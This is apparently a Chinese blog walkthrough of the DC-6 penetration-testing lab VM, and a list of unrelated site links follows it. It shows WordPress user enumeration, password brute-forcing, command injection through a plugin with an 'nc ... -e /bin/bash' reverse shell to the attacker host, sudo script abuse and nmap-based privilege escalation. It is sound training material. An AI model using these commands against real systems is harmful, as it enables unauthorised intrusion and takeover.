当前位置: 首页 > news >正文

DC-6靶机渗透测试

先对内网进行探活扫描

nmap -sn 192.168.207.0/24

dc-6的ip是192.168.207.136,进行端口扫描

nmap -sV -p- 192.168.207.136

有两个端口22(ssh)80(http),先上浏览器访问http://192.168.207.136查看一下网站内容

修改hosts文件

nano /etc/hosts
192.168.207.136 wordy

重新访问http://wordy

用的wordpress框架,进行目录扫描

dirsearch -u http://wordy

找到了wp-login.php

使用wpscan获取用户名

wpscan --url http://wordy -e u

有admin、mark、graham、sarah、jens五个账户,等会可以考虑ssh

接下来破解密码,使用kali自带的rockyou.txt

这个需要先解压

cd /usr/share/wordlists
gzip -d rockyou.txt.gz
mv rockyou.txt /home/kali

因为rockyou太大了,要大约尝试71721960次,我后来查看靶机官网,提示我们使用以下命令

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

grep k01 > passwords.txt:查找包含字符串 k01 的行,重定向输出到文件

等于是给我们缩小爆破范围,但是实际爆破肯定是没有这个信息的,或者需要我们自己去收集这个信息

在/home/kali目录下进行密码破解

wpscan --url http://wordy --passwords passwords.txt

跑出mark / helpdesk01

登录看看

成功进入后台

查看网页功能发现Activity monitor > Tools里输入ip后,点击lookup后有回显

可以考虑rce远程命令注入

想要输入其他命令发现不能输入,有字数限制

打开f12,框选输入框

将maxlength改为150就可以了

写反弹shell到kali终端上

nc -lvvp 6666

nc 192.168.207.128 6666 -e /bin/bash

python -c 'import pty;pty.spawn("/bin/bash")'

切换到home目录

查看mark目录有什么

查看things-to-do.txt

cat things-to-do.txt

恢复超空间驱动器的全部功能(需要与Jens沟通)

为Sarah的欢送会购买礼物

新增用户:graham - GSo7isUM1D4 - 已完成

申请OSCP课程

为Sarah的接替者购买新笔记本电脑

这里可知graham / GSo7isUM1D4

ssh graham@192.168.207.136 -p 22

查看当前用户可执行操作

sudo -l

可以操作backups.sh,但是要切换到jens用户来执行

echo "/bin/bash" >> /home/jens/backups.sh

将/bin/bash追加写入到backups.sh中

sudo -u jens /home/jens/backups.sh

sudo -u jens:以jens用户身份来执行后面的命令

sudo -l

nmap可以以root身份执行

搜索nmap提权

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

whoami

cat theflag.txt

渗透测试成功

http://www.jsqmd.com/news/1304627/

相关文章:

  • 电力系统动态状态估计:卡尔曼滤波MATLAB实现与对比
  • JDK22 安装包(附安装教程)
  • 华三交换机ACL配置实战:基于IP网段实现内网访问控制与安全隔离
  • 豆包知识问答配置实操手册:手把手教你3步完成高准确率问答系统搭建
  • STM32F103硬件CRC校验原理与Modbus RTU实战应用
  • ComfyUI UltimateSDUpscale安装问题深度解析:从模块缺失到完美修复
  • PTP报文格式深度解析:从协议原理到抓包排错实战
  • 硬件工程师实战指南:二极管、三极管、MOSFET核心参数、选型与电路设计避坑
  • 基于CH32V307 RISC-V芯片的智能风扇完整实现方案
  • Java 在 Word 中生成和更新目录:多级标题与页码
  • C++右值引用与移动语义:从原理到实战的性能优化指南
  • 抖音批量下载神器:开源工具助你轻松获取无水印视频
  • Meta Quest 3混合现实开发实战:手部追踪与场景锚点构建沉浸式MR应用
  • 异或运算交换变量值
  • git使用时记住用户名和密码
  • UART串口通信波形全解析:从起始位到停止位,掌握嵌入式调试核心技能
  • AI招聘视频转化率提升300%的7个底层逻辑:从脚本设计到算法推荐全拆解
  • 物理信息神经网络(PINN)在多变量回归预测中的应用与实践
  • Godot VR开发:信号系统构建模块化交互架构实践
  • 【Bug已解决】[Feature request] Support already-sharded DataLoaders in Accelerator.prepare 解决方案
  • AI 编译与推理优化领域 7 月精华:重要论文、开源项目突破与社区讨论总结
  • 从原理到实战:50Hz工频干扰与双T型陷波器设计全解析
  • MEMD信号分解技术:原理、实现与工业应用
  • 共情语音评测:从情感识别到AI情感智能的技术演进与应用
  • STM32按键扫描函数KEY_Scan设计:从消抖到事件处理的嵌入式实战
  • 如何让闲置电视盒子变身家庭Wi-Fi中心:TVBoxOSC网络共享完整指南
  • AI 辅助研发内部复盘(2/5):老项目改造的工程化实践
  • Python可视化五大激活函数及其导数:从Sigmoid到Softmax的深度解析
  • 零代码AI智能体实现招标文件高效解析与风险识别
  • 网口与串口深度解析:从硬件原理到实战调试的嵌入式通信指南